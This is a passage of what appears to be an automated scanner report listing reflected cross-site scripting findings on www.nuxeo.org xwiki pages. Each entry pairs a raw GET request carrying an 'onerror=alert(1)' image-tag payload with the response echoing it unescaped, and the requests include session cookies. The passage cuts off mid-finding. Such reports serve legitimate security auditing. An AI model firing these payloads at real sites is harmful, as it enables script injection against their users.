Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2faea%3Cimg+src%3Da+onerror%3Dalert%281%29%3E80fd4319524/">Main2faea<img src=a onerror=alert(1)>80fd4319524</a>
...[SNIP]...

4.522. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68 was submitted in the REST URL parameter 4. This input was echoed as 8c472"><img src=a onerror=alert(1)>24ed474cd68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main8c472%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E24ed474cd68/Tags?format=xar&amp;name=Main8c472"><img src=a onerror=alert(1)>24ed474cd68.Tags&amp;pages=Main8c472">
...[SNIP]...

4.523. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 was submitted in the REST URL parameter 5. This input was echoed as f901e<img src=a onerror=alert(1)>63acc2cbc28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tagsf901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Tagsf901e%3Cimg+src%3Da+onerror%3Dalert%281%29%3E63acc2cbc28'>Tagsf901e<img src=a onerror=alert(1)>63acc2cbc28</a>
...[SNIP]...

4.524. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed was submitted in the REST URL parameter 5. This input was echoed as 7d0e5"><img src=a onerror=alert(1)>430e2cf64ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tags7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Tags7d0e5%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E430e2cf64ed?format=xar&amp;name=Main.Tags7d0e5"><img src=a onerror=alert(1)>430e2cf64ed&amp;pages=Main.Tags7d0e5">
...[SNIP]...

4.525. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703 was submitted in the REST URL parameter 4. This input was echoed as be1aa"><img src=a onerror=alert(1)>c2cf5c63703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainbe1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13253
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainbe1aa%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2cf5c63703/Understanding+JBoss+Directories?format=xar&amp;name=Mainbe1aa"><img src=a onerror=alert(1)>c2cf5c63703.Understanding JBoss Directories&amp;pages=Mainbe1aa">
...[SNIP]...

4.526. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a was submitted in the REST URL parameter 4. This input was echoed as f0e56<img src=a onerror=alert(1)>8311f0b5e3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13187
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf0e56%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8311f0b5e3a/">Mainf0e56<img src=a onerror=alert(1)>8311f0b5e3a</a>
...[SNIP]...

4.527. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae was submitted in the REST URL parameter 5. This input was echoed as e87d7"><img src=a onerror=alert(1)>89b0697bfae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriese87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13237
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
a href="http://www.nuxeo.org/xwiki/bin/export/Main/Understanding+JBoss+Directoriese87d7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E89b0697bfae?format=xar&amp;name=Main.Understanding JBoss Directoriese87d7"><img src=a onerror=alert(1)>89b0697bfae&amp;pages=Main.Understanding JBoss Directoriese87d7">
...[SNIP]...

4.528. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c was submitted in the REST URL parameter 5. This input was echoed as a2dfb<img src=a onerror=alert(1)>c65f4a3268c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13175
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec65f4a3268c'>Understanding JBoss Directoriesa2dfb<img src=a onerror=alert(1)>c65f4a3268c</a>
...[SNIP]...

4.529. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eab17<img%20src%3da%20onerror%3dalert(1)>123105c7679 was submitted in the REST URL parameter 4. This input was echoed as eab17<img src=a onerror=alert(1)>123105c7679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maineab17<img%20src%3da%20onerror%3dalert(1)>123105c7679/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12979
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maineab17%3Cimg+src%3Da+onerror%3Dalert%281%29%3E123105c7679/">Maineab17<img src=a onerror=alert(1)>123105c7679</a>
...[SNIP]...

4.530. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5 was submitted in the REST URL parameter 4. This input was echoed as 49dbe"><img src=a onerror=alert(1)>8944e5657f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:11 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13045
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main49dbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8944e5657f5/Using+Nuxeo+API?format=xar&amp;name=Main49dbe"><img src=a onerror=alert(1)>8944e5657f5.Using Nuxeo API&amp;pages=Main49dbe">
...[SNIP]...

4.531. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf was submitted in the REST URL parameter 5. This input was echoed as 5e592<img src=a onerror=alert(1)>203fdc532cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12967
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API5e592%3Cimg+src%3Da+onerror%3Dalert%281%29%3E203fdc532cf'>Using Nuxeo API5e592<img src=a onerror=alert(1)>203fdc532cf</a>
...[SNIP]...

4.532. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 was submitted in the REST URL parameter 5. This input was echoed as 50755"><img src=a onerror=alert(1)>95dc43f2514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13029
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Using+Nuxeo+API50755%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95dc43f2514?format=xar&amp;name=Main.Using Nuxeo API50755"><img src=a onerror=alert(1)>95dc43f2514&amp;pages=Main.Using Nuxeo API50755">
...[SNIP]...

4.533. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef was submitted in the REST URL parameter 4. This input was echoed as 7cb09"><img src=a onerror=alert(1)>27e195a34ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main7cb09%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E27e195a34ef/WebRss?format=xar&amp;name=Main7cb09"><img src=a onerror=alert(1)>27e195a34ef.WebRss&amp;pages=Main7cb09">
...[SNIP]...

4.534. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2 was submitted in the REST URL parameter 4. This input was echoed as 76490<img src=a onerror=alert(1)>4484ac9bb2 in the application's response.

